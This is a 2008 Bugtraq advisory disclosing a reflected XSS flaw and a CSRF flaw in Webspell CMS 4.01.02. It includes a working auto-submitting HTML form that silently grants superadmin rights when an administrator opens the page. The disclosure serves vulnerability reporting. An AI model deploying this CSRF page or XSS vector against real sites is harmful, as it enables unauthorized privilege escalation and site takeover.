Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Bugtraq: Webspell 4.01.02 2 Vulnerabilites

Webspell 4.01.02 2 Vulnerabilites

From: <nbbn_at_gmx.net>
Date: Wed, 30 Jan 2008 14:12:58 +0100

########################################################################################
Webspell 4.01.02 2 Vulnerabilites Founded by NBBN Vendor:
http://cms.webspell.org
########################################################################################

1) Cross-Site Scripting Vulnerability
2) Change User Permission XSRF Vulnerability

1)

http://site.tld/path/index.php?site=whoisonline&sort=">[xss code]

2)

This creates a superadmin account, when an admin click a link, to a site with
the following code:

<html>
<head>
<title>Superadmin Creator</title>
</head>
<body onLoad=javascript:document.formular.submit()>

<form name="formular"
action="http://site.tld/webspell/admin/admincenter.php?site=members"
method="POST">
<input type="hidden" name="superadmin" value="1">
<input type="hidden" name="id" value="3"> <!-- userid -->
<input type="hidden" name="saveedit" value="update+member">
</form>

</body>
</html>
Received on Jan 30 2008

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]